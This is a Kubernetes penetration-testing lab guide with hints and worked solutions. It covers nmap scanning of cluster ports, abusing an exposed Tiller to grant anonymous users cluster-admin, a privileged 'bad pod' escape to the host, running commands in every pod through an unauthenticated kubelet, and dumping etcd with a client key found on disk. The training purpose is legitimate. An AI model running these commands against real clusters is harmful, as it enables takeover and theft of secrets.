Lab_06 - Hacking From the Outside
Lab 6: Hacking From the Outside
1. Interesting Ports in Kubernetes
We are interested in scanning common k8s ports in order to see which are remotely exposed and what services are up and running
Interesting Ports:
443, 6443, 8080, 8443 - Kubernetes API port
2379, 6666 - ETCD Port
10250, 10255 - Kubelet API port
44134 - Tiller
4194 - cAdvisor Container Metrics
9099 - Health check for Calico
6782-6784 - Metrics and endpoints
10256 - Kube Proxy health check
30000-32767 - Proxifying traffic into declared Services
40997 - Docker containerd
Hint
The nmap command will help!
Solution
nmap -n -T4 -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 <IP>
For service scan and fingerprinting use "-A", but it takes longer
nmap -n -T4 -A -v -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 <IP>
2. Tiller
We found tiller running on port 44134. Let's try to exploit it
In this case we will weaponize our knowledge of CluserRoles and ClusertRoleBindings to make "system:anonymous" a Cluster Administrator.
We will use kubectl to test that currently "system:anonymous" has no privileges on the Kubernetes API:
kubectl -s https://<IP>:6443 --insecure-skip-tls-verify=true auth can-i --list
# Expected error == selfsubjectrulesreviews.authorization.k8s.io is forbidden: User "system:anonymous" cannot create resource "selfsubjectrulesreviews" in API group "authorization.k8s.io" at the cluster scope
Hint
Use the course exploit scripts "helm-tiller-pwn". Also, the helm command will help!
Solution
clusterrole.yaml:
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: anonymous-admin-access
rules:
- apiGroups: ["*"]
resources: ["*"]
verbs: ["*"]
- nonResourceURLs: ["*"]
verbs: ["*"]
clusterrolebinding.yaml:
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: anonymous-admin-access
namespace: default
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: anonymous-admin-access
subjects:
- kind: User
name: system:anonymous
apiGroup: rbac.authorization.k8s.io
Exploit:
cd k8s-hacking-scripts/11/helm-tiller-pwn
helm --host <IP>:44134 install --name pwn pwnchart
kubectl -s https://<IP>:6443 --insecure-skip-tls-verify=true auth can-i --list
3. Kubernetes API
Ok, so we are the Cluster Administrator now. How do we create malicious pods in order to exploit the master and/or worker nodes that run our pods?
Let's try a bad pod attack.
Hint
https://bishopfox.com/blog/kubernetes-pod-privilege-escalation
Solution
Exploit:
kubectl -s https://<IP>:6443 --insecure-skip-tls-verify=true apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml
kubectl -s https://<IP>:6443 --insecure-skip-tls-verify=true describe pod everything-allowed-exec-pod
kubectl -s https://<IP>:6443 --insecure-skip-tls-verify=true exec -it everything-allowed-exec-pod -- chroot /host bash
4. Kubelet API
We also identified the kubelet API on port 10250. Does the service allow unauthenticated access?
Hint
Use curl or get kubeletctl.
Solution
Test with curl:
curl https://<IP>:10250/pods -k
Install and test with kubeletctl:
wget https://github.com/cyberark/kubeletctl/releases/download/v1.9/kubeletctl_linux_amd64
mv ./kubeletctl_linux_amd64 kubeletctl
chmod a+x ./kubeletctl
./kubeletctl pods
If the service allows unauthenticated access what malicious actions can be performed?
List Pods
Run Commands in Pods
Solution
Example of running commands in all pods:
./kubeletctl pods
./kubeletctl run id --all-pods
./kubeletctl run "/bin/cat /etc/passwd" --all-pods
Some pods have no basic linux binaries (cat, ls, etc.). How do we gat any information from them?
Let's try exploring "etcd-k8s-vuln-0x-01-master" a pod with no binaries.
Solution
./kubeletctl exec /bin/sh -p etcd-k8s-vuln-0x-01-master -n kube-system -c etcd # Pod name may vary
echo * # no ls, no problem
echo .* # list hidden files/folders
echo "`</etc/passwd`" # no cat, no problem
5. ETCD
We observed based on the initial nmap scan that the ETCD port 2379 is not remotely exposed. Let's ssh into out master node and run nmap again
Solution
nmap -n -T4 -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 127.0.0.1
For service scan and fingerprinting use "-A", but it takes longer
nmap -n -T4 -A -v -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 127.0.0.1
Now we have access to the TCP port 2379, but authentication is required by ETCD. Let's try to identify files of interest on the master node that will help us in the attack.
Files of interest usually contain the following string in their name:
".conf"
"config"
".key"
Hint
The find command will help!
Solution
Find files of interest:
find / -readable -iname "*.conf*" -ls 2>/dev/null
find / -readable -iname "*config*" -ls 2>/dev/null
find / -readable -iname "*.key*" -ls 2>/dev/null
We can see the readable file of interest: "/tmp/apiserver-etcd-client.key"
Ok, we found what seems to be a private key for ETCD client authentication. Does ETCD allow client authentication? Can we use it with to read ETCD data?
Hint
The ps and curl commands will help!
Solution
Use ps to see ETCD flags that allow client authentication:
ps aux | grep etcd
# has "--client-cert-auth=true"
Use curl with the public and private client keys:
curl --key /tmp/apiserver-etcd-client.key --cert /etc/kubernetes/pki/apiserver-etcd-client.crt -d '{"key": "AA==", "range_end": "AA=="}' https://127.0.0.1:2379/v3/kv/range -v -k
Great, we can read ETCD data ... but everything is base64 and the ETCD endpoints and parameters are hard to remember. Can we make our life easier with a tool?
Hint
The etcdctl tool will help!
Solution
Get etcdctl:
wget https://github.com/etcd-io/etcd/releases/download/v3.5.11/etcd-v3.5.11-linux-amd64.tar.gz
tar -xzvf etcd-v3.5.11-linux-amd64.tar.gz
Use etcdctl:
ETCDCTL_KEY=/tmp/apiserver-etcd-client.key ETCDCTL_CERT=/etc/kubernetes/pki/apiserver-etcd-client.crt ETCDCTL_INSECURE_SKIP_TLS_VERIFY=true ETCDCTL_API=3 ./etcd-v3.5.11-linux-amd64/etcdctl --debug --endpoints https://127.0.0.1:2379 get / --prefix --keys-only
6. Automated Tools - kube-hunter
Manual testing is the gold standard, but let's see what could be identified with a automated scanning tool like "kube-hunter".
Hint
https://github.com/aquasecurity/kube-hunter
Solution
Get and run kube-hunter:
wget https://github.com/aquasecurity/kube-hunter/releases/download/v0.6.8/kube-hunter-linux-x86_64-refs.tags.v0.6.8 -O kube-hunter
chmod +x kube-hunter
./kube-hunter
Last updated